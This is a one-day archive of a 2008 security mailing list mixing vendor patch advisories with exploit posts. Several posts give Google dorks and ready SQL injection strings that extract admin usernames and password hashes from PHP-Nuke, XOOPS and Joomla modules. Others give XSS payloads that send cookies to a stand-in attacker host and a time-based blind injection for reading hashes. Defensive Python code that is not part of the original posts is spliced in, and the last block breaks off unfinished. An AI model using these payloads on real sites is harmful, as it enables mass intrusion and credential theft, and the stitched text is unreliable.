[SECURITY] [DSA 1499-1] New pcre3 packages fix arbitrary code execution

2008-02-19 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1499-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Florian Weimer
February 19, 2008 http://www.debian.org/security/faq
- 

Package: pcre3
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-0674

It was discovered that specially crafted regular expressions involving
codepoints greater than 255 could cause a buffer overflow in the PCRE
library (CVE-2008-0674).

For the stable distribution (etch), this problem has been fixed in
version 6.7+7.4-3.

For the old stable distribution (sarge), this problem has been fixed in
version 4.5+7.4-2.

For the unstable distribution, this problem has been fixed in version
7.6-1.

We recommend that you upgrade your pcre3 package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

Source archives:


Access violation and limited information disclosure in webcamXP 3.72.440.0

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  webcamXP
  http://www.webcamxp.com
Versions: <= 3.72.440.0
  <= beta 4.05.280
Platforms:Windows
Bug:  access violation with limited information disclosure
Exploitation: remote
Date: 18 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


webcamXP is a commercial webcam software with an integrated webserver
for sharing one's own videos.


###

==
2) Bug
==


The pocketpc and show_gallery_pic URIs are used by external users
to watch the images of the current webcams.
The problem is that there are no checks on the webcam number passed
by the client, allowing an attacker to go outside the array which
contains all the data about each webcam.

The main effect of this bug is the silent interruption of the service
due to the access violation caused by the reading of unallocated
memory, visible in the browser of the client who has performed the
malicious request.
For example, /pocketpc allows access to the memory above and below
offset 007196f0 (the location of the array in version 3.72.440.0) in
steps of 6360 bytes for each webcam number.

The secondary effect is the possibility of reading 8 bytes of the
process's memory in a partially arbitrary way (the array's offset is
fixed and it is only possible to jump 6360 bytes at a time), since
/pocketpc displays these two 32-bit numbers in the "width" and "height"
parameters of the returned HTML page, as visible in the assembly code
starting from offset 006BD46F.


###

===
3) The Code
===


http://SERVER:8080/pocketpc?camnum=99&mode=0
http://SERVER:8080/pocketpc?camnum=-99&mode=0
http://SERVER:8080/show_gallery_pic?id=99


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


Two heap overflow in Foxit WAC Server 2.0 Build 3503

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Foxit Remote Access Server (WAC Server)
  http://www.foxitsoft.com/wac/server_intro.php
Versions: <= 2.0 Build 3503
Platforms:Windows
Bugs: A] telnet option heap overflow
  B] SSH packet heap overflow
Exploitation: remote
Date: 16 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


WAC is a commercial SSH/telnet server for Windows.


###

===
2) Bugs
===

--
A] telnet option heap overflow
--

The WAC server is vulnerable to a heap overflow exploitable through the
usage of options longer than 260 bytes.

Note: this bug was wrongly reported by me as a crash and with a wrong
server version one month ago.


---
B] SSH packet heap overflow
---

The server is also affected by another heap overflow exploitable
through big SSH packets; no deeper research has been performed
on this vulnerability.


###

===
3) The Code
===


http://aluigi.org/poc/wachof.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


Multiple buffer-overflow in NowSMS v2007.06.27

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Now SMS/MMS Gateway
  http://www.nowsms.com
Versions: <= v2007.06.27
Platforms:Windows
Bugs: A] web authorization buffer-overflow
  B] SMPP buffer-overflow
Exploitation: remote
Date: 19 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


NowSMS is a commercial SMS and MMS Content Delivery Solution.


###

===
2) Bugs
===


A] web authorization buffer-overflow


The web interface of NowSMS which listens on port 8800 allows the users
to use the gateway for sending various types of messages (EMS, binary,
WAP, MMS and so on).

The function which handles the base64 password located in the HTTP
Authorization parameter is affected by a stack-based buffer overflow
exploitable with more than 256 bytes.

The server can be exploited both when it requires and when it doesn't
require authentication.


---
B] SMPP buffer-overflow
---

NowSMS uses a stack buffer of 4 kilobytes to hold the incoming
SMPP packets.
The lack of checks on the real size of these packets (max 0x
bytes) leads to a buffer overflow vulnerability which can be exploited
by an attacker to execute malicious code remotely.

The SMPP server is not enabled by default and doesn't have a default
listening port (the admin must decide it).


###

===
3) The Code
===


http://aluigi.org/poc/nowsmsz.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
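The Authorization-header bug above is a missing length check in front of a base64 decode. As an added example (not Luigi's code and not NowSMS's), the Python below parses a Basic credential with the 256-byte cap enforced before anything is decoded, and scans constructed raw HTTP requests for tokens that exceed it; the cap, the choice to measure the encoded token, and the sample requests are assumptions.

```python
import base64
import binascii
import re

# The advisory says the handler for the base64 password in the HTTP
# Authorization header overflows with more than 256 bytes; this parser
# refuses anything larger *before* it decodes. Whether the limit applied to
# encoded or decoded bytes is not stated, so the cap (assumed here) is put on
# the encoded token, which is never shorter than its decoded form.
MAX_TOKEN_LEN = 256

BASIC_RE = re.compile(r"\s*Basic\s+([A-Za-z0-9+/]+=*)\s*$")


class AuthError(ValueError):
    """Raised for any credential the server should refuse to process."""


def parse_basic_authorization(header_value, max_len=MAX_TOKEN_LEN):
    """Return (user, password) from 'Basic <base64>' or raise AuthError."""
    m = BASIC_RE.match(header_value)
    if not m:
        raise AuthError("not a Basic credential")
    token = m.group(1)
    if len(token) > max_len:  # size check happens before the decode, not after
        raise AuthError("credential too long (%d > %d)" % (len(token), max_len))
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error as exc:
        raise AuthError("invalid base64") from exc
    user, sep, password = raw.decode("latin-1").partition(":")
    if not sep:
        raise AuthError("missing ':' separator")
    return user, password


def rejection_reason(header_value):
    """Detection helper: None if the header parses, else why it was refused."""
    try:
        parse_basic_authorization(header_value)
    except AuthError as exc:
        return str(exc)
    return None


def scan_requests(raw_requests):
    """Flag raw HTTP requests whose Authorization header would be refused."""
    findings = []
    for req in raw_requests:
        head = req.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
        lines = head.split("\r\n")
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() != "authorization":
                continue
            reason = rejection_reason(value)
            if reason:
                findings.append({"request": lines[0], "reason": reason})
    return findings


# Constructed sample traffic (not captured from NowSMS): one normal login
# and one whose token is 400 bytes of valid base64.
GOOD_TOKEN = base64.b64encode(b"alice:secret").decode("ascii")
LONG_TOKEN = "QUFB" * 100  # decodes to 300 x "A"; the overlong case
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: gateway:8800\r\n"
    b"Authorization: Basic " + GOOD_TOKEN.encode() + b"\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: gateway:8800\r\n"
    b"Authorization: Basic " + LONG_TOKEN.encode() + b"\r\n\r\n",
]

if __name__ == "__main__":
    print(parse_basic_authorization("Basic " + GOOD_TOKEN))
    for finding in scan_requests(SAMPLE_REQUESTS):
        print("REFUSED:", finding)
```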


NULL pointer crash in freeSSHd 1.20

2008-02-19 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  freeSSHd
  http://www.freesshd.com
  Note: it is possible that the problem also affects
  wodSSHServer, but this has not been tested
Versions: <= 1.2.0
Platforms:Windows
Bug:  NULL pointer crash
Exploitation: remote
Date: 17 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


freeSSHd is a free SSH server for Windows.


###

==
2) Bug
==


The server can be crashed through a NULL pointer access simply by
sending an SSH2_MSG_NEWKEYS packet as the first command.


###

===
3) The Code
===


http://aluigi.org/poc/freesshdnull.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
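The crash above is a message accepted out of sequence: SSH2_MSG_NEWKEYS arriving before any key exchange has produced keys to switch to. As an added example (not freeSSHd's code, and a deliberately simplified key-exchange flow that models only the server's receive side), the Python below frames and parses RFC 4253 binary packets with every length checked, and refuses NEWKEYS unless KEXINIT and KEXDH_INIT have already been seen; the message numbers and packet limit are from RFC 4253, the three-step state order is the assumption.

```python
import struct
from enum import Enum

# Message numbers from RFC 4253 section 12.
SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_KEXDH_INIT = 30
MAX_PACKET = 35000  # RFC 4253 section 6.1: largest packet an implementation must accept


class KexState(Enum):
    """Receive-side view of the client stream; the server's own replies are not modelled."""
    NEED_KEXINIT = 1
    NEED_KEXDH_INIT = 2
    NEED_NEWKEYS = 3
    KEYS_READY = 4


EXPECTED_MSG = {
    KexState.NEED_KEXINIT: SSH_MSG_KEXINIT,
    KexState.NEED_KEXDH_INIT: SSH_MSG_KEXDH_INIT,
    KexState.NEED_NEWKEYS: SSH_MSG_NEWKEYS,
}


def build_packet(payload, block=8):
    """Frame payload as an RFC 4253 binary packet: uint32 packet_length,
    byte padding_length, payload, padding (zeros here), no MAC before NEWKEYS."""
    pad = block - ((5 + len(payload)) % block)
    if pad < 4:  # padding must be at least 4 bytes
        pad += block
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + bytes(pad)


def parse_packet(data):
    """Return (payload, rest) or raise ValueError; every length is checked
    before it is used as an offset."""
    if len(data) < 5:
        raise ValueError("short packet header")
    packet_length, padding_length = struct.unpack(">IB", data[:5])
    if packet_length > MAX_PACKET:
        raise ValueError("packet_length exceeds limit")
    if padding_length < 4 or padding_length + 1 > packet_length:
        raise ValueError("bad padding_length")
    if len(data) < 4 + packet_length:
        raise ValueError("truncated packet")
    payload = data[5:5 + packet_length - padding_length - 1]
    return payload, data[4 + packet_length:]


def is_malformed(data):
    try:
        parse_packet(data)
    except ValueError:
        return True
    return False


class KexStateMachine:
    """Accepts the three key-exchange messages only in order; anything else is
    recorded and dropped, so NEWKEYS is never acted on with no keys derived."""

    def __init__(self):
        self.state = KexState.NEED_KEXINIT
        self.rejected = []  # (state name, message number or None)

    def handle(self, payload):
        if self.state is KexState.KEYS_READY:
            return True  # encrypted phase, outside this example
        msg = payload[0] if payload else None
        if msg != EXPECTED_MSG[self.state]:
            self.rejected.append((self.state.name, msg))
            return False
        self.state = KexState(self.state.value + 1)
        return True


def run_session(stream):
    """Feed a byte stream of packets through the state machine and return it."""
    sm = KexStateMachine()
    while stream:
        payload, stream = parse_packet(stream)
        sm.handle(payload)
    return sm


if __name__ == "__main__":
    # The advisory's case: NEWKEYS as the very first message.
    first = run_session(build_packet(bytes([SSH_MSG_NEWKEYS])))
    print(first.state, first.rejected)
```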


[ MDVSA-2007:047 ] - Updated Thunderbird packages fix multiple vulnerabilities

2008-02-19 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2007:047
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: February 19, 2008
 Affected: 2007.1, 2008.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 2.0.0.9.
 
 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3735
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3844
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3845
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340
 http://www.mozilla.org/security/announce/2007/mfsa2007-18.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-26.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-27.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-29.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.1:

PHP-Nuke Module Web_Links SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   PHP-Nuke Module Web_Links SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl:  file-index modules-php-op-modload-name-Web_Links "l_op 
viewlink"

# 

   DORK 2 : allinurl:  cid file-index modules-php-op-modload"l_op 
viewlink"name-Web_Links 




   example : 


http://XXX/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid= 
(exploit)


   EXPLOİT


modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 







[SECURITY] [DSA 1498-1] New libimager-perl packages fix arbitrary code execution

2008-02-19 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1498-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
February 19, 2008 http://www.debian.org/security/faq
- 

Package: libimager-perl
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2007-2459
Debian Bug : 421582


It was discovered that libimager-perl, a Perl extension for generating 24
bit images, did not correctly handle 8-bit per-pixel compressed images,
which could allow the execution of arbitrary code.

For the stable distribution, this problem has been fixed in version
0.50-1etch1.

We recommend that you upgrade your libimager-perl package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/



XOOPS Module wflinks SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#XOOPS Module wflinks SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: modules/wflinks/viewcat.php

# 

#  DORK 2 : allinurl: modules/wflinks

#





  example


  http://xx.com/modules/wflinks/viewcat.php?cid= [exploit]


  EXPLOIT : 


-88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 






XOOPS Module eEmpregos SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module eEmpregos SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: "modules/eEmpregos/index.php"

# 

#  DORK 2 : allinurl:  cid "modules/eEmpregos"

#



   example


  http:///modules/eEmpregos/index.php?pa=view&cid=[exploit]



EXPLOIT : 


-%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module classifieds SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module classifieds SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: cid"modules/classifieds/index.php?pa=Adsview"

# 



   

  example


http:///modules/classifieds/index.php?pa=Adsview&cid=[exploit]


 EXPLOIT : 


-0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





Re: CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference

2008-02-19 Thread si0uxsecurity
A basic malware to exploit this vulnerability:

http://si0ux.blogspot.com/2008/02/sara-malware.html




joomla SQL Injection(com_magazine)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_magazine)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_magazine"pageid=

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/**




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module seminars SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module seminars SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"modules/seminars/index.php?op=show"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/seminars/index.php?op=show&id=-7/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module badliege SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module badliege SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"modules/badliege/index.php?op=show"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/badliege/index.php?op=show&id=-999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 




XOOPS Module events SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module events SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"modules/events/index.php?op=show"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/events/index.php?op=show&id=-+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 




XOOPS Module vacatures SQL Injection

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module vacatures SQL Injection

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"/modules/vacatures/index.php?pa=view"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


modules/vacatures/index.php?pa=view&cid=-0/**/union/**/select/**/,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_foevpartners)

2008-02-19 Thread hackturkiye . hackturkiye

###

# 

#   joomla SQL Injection(com_foevpartners)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_foevpartners"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals

2008-02-19 Thread ProCheckUp Research

PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals


Description:

BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are 
vulnerable to an XSS vulnerability affecting the 'name' parameter which 
is submitted to the '/portal/server.pt' server-side script.


Date found: 12th September 2006

Vendor contacted: 18th May 2007

Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.


Severity: Medium-High


Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks BEA Systems for their co-operation.

Proof of concept:

The following requests launch a JavaScript alert box on the user's web 
browser, simply to prove that it is possible to run scripting code on the 
victim's web browser.


Please note that '%22;}%3C/script%3E' is added at the beginning of every 
payload in order to make the overall HTML document syntactically 
correct, thus increasing the chance of the attack working on different 
web browser types:


https://target-domain.foo/portal/server.pt?open=space&name=alert('CanCrossSiteScript')
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--


The following requests allow session hijacking through cookie theft:

https://target-domain.foo/portal/server.pt?open=space&name=window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a 
third-party 'spoof' site which would perform a phishing attack on the 
victim:


https://target-domain.foo/portal/server.pt?open=space&name=window.location="http://phishers-site.foo";
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This 
allows advanced phishing attacks by inserting an HTML form within the 
context of the victim website.



Consequences:

Scripting code can be run within the security context of the target 
site. User accounts can be hijacked. Advanced phishing attacks can be 
launched.



Note:

This vulnerability could be considered a medium-high risk (rather than 
medium risk) in cases in which admin users are targeted, resulting in 
the attacker gaining administrative privileges on the target 
Plumtree/AquaLogic Portal.



Fix: this issue will be addressed in the 6.5 release of AquaLogic 
Interaction.



References:

"ProCheckUp - Security Vulnerabilities"
http://www.procheckup.com/Vulnerabilities.php

BEA's BEA08-186.00 advisory:

"Security Advisories and Notifications"
http://dev2dev.bea.com/advisoriesnotifications/


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if, the Bulletin is not edited or changed in any way, is attributed 
to Procheckup, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.


Any other use of this information is prohibited. Procheckup is not 
liable for any misuse of this information by any third party.
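The '%22;}%3C/script%3E' prefix in the advisory shows where the reflection lands: inside a double-quoted string in a function body within a script block, so the payload closes the string, the block and the element in turn. As an added example, not ProCheckUp's or BEA's code, the Python below reproduces that context with a hypothetical page template, renders the advisory's own payload through a vulnerable and a hardened version, and counts the script tags that result; the template and the second HTML sink are assumptions.

```python
import html
import json
from urllib.parse import unquote

# The advisory's second proof-of-concept payload, URL-decoded.
PAYLOAD = unquote("%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--")


def build_page(name_js, name_html):
    """Hypothetical page skeleton: 'name' lands inside a quoted JS string in a
    function body (the context the '";}</script>' prefix is shaped to break out
    of) and again as element text. One <script> element, always."""
    return ("<html><body><script>\n"
            "function openSpace() { var space = {name: " + name_js + "}; }\n"
            "</script>\n"
            '<h1 id="space-title">' + name_html + "</h1></body></html>")


def render_vulnerable(name):
    # Raw interpolation: the first '"' in the value ends the JS string literal,
    # '}' ends the function body and '</script>' ends the element.
    return build_page('"' + name + '"', name)


def js_string_literal(value):
    """JSON-encode for JavaScript, then escape the characters the HTML parser
    acts on inside <script>, so the literal can never contain '</script'."""
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        literal = literal.replace(ch, esc)
    return literal


def render_safe(name):
    # Each sink gets the encoder for its own context: JS string vs HTML text.
    return build_page(js_string_literal(name), html.escape(name, quote=True))


def script_tag_count(page):
    """The skeleton has exactly one <script>; any more came from the input."""
    return page.lower().count("<script")


if __name__ == "__main__":
    print("vulnerable:", script_tag_count(render_vulnerable(PAYLOAD)))
    print("hardened:  ", script_tag_count(render_safe(PAYLOAD)))
```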




WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

2008-02-19 Thread nbbn
##
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
##


::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,(SELECT password FROM wcf1_user WHERE userID=1 AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(300,MD5(23)),1))

An attacker should have to register at the board to use this. 

You can ask TRUE/FALSE questions to the database. Modify 300 if the stuff 
doesn't work. On some MySQL versions you need to edit this query.



::Explain:

...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(300,MD5(23)),1))

1,1 is the position in the crypted password. 55 is the char in the 
ASCII table. 

In this example we ask for number 7 in the hash, position 1. If the page loads 
fast, you have found a true char. If not, ask other chars ;-). If you enter a char 
that is higher than the true one, the page loads fast too, so start from 48 first 
and go higher. 



::Vulnerability
As I found this, WBB 3.0.4 was only running at the support forums of WoltLab, so 
I didn't test it, because there is no reason and I am not a cracker ;-)

WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX 
WoltLab Burning Board 3.0.1 PLX 
WoltLab Burning Board 3.0.0 PLX
Possible WoltLab Burning Board 3.0.4 (not tested)...



Please don't use this to crack forums. All what you do with this is at your 
own risk. 
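The proof of concept above works because sortField and sortOrder reach the ORDER BY clause as raw text, and the Explain section describes the time-based inference that follows, one character of the hash per comparison. As an added example, not WoltLab's code, the Python below shows the allowlist that removes the injection point (ORDER BY cannot be bound as a prepared-statement parameter) and a scanner that flags requests carrying timing or substring functions in those parameters, run over constructed access-log lines; the column names in the allowlist and the log format are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# ORDER BY cannot be parameterised, so the only safe handling is to map the
# request value onto a fixed set of names. Column names are assumed.
ALLOWED_SORT_FIELDS = {"isViewed", "subject", "time"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}


def safe_order_by(params):
    """Return an ORDER BY clause built only from allowlisted tokens, or None."""
    field = params.get("sortField", ["time"])[0]
    order = params.get("sortOrder", ["DESC"])[0].upper()
    if field not in ALLOWED_SORT_FIELDS or order not in ALLOWED_SORT_ORDERS:
        return None
    return "ORDER BY %s %s" % (field, order)


# Functions that only turn up in a sort parameter when the query is being used
# for inference: the timing primitives and the per-character extraction.
SUSPECT_FUNCS = re.compile(r"\b(BENCHMARK|SLEEP|SUBSTR|SUBSTRING|ORD|ASCII)\s*\(", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CLIENT_IP = re.compile(r"^(\S+)")


def inspect_sort_params(url):
    """Return a list of (param, value, reason) for anything not allowlisted."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    problems = []
    for key, allowed in (("sortField", ALLOWED_SORT_FIELDS),
                         ("sortOrder", ALLOWED_SORT_ORDERS)):
        for value in qs.get(key, []):
            if SUSPECT_FUNCS.search(value):
                problems.append((key, value, "sql function in sort parameter"))
            elif (value.upper() if key == "sortOrder" else value) not in allowed:
                problems.append((key, value, "value not in allowlist"))
    return problems


def scan_access_log(lines):
    """Run inspect_sort_params over each request line and collect findings."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        for key, value, reason in inspect_sort_params(m.group(1)):
            findings.append({"ip": CLIENT_IP.match(line).group(1),
                             "param": key, "reason": reason})
    return findings


# Constructed Apache-style log lines (not from a real WBB install): the first
# is an ordinary PM list request, the second carries the advisory's query.
SAMPLE_LOG = [
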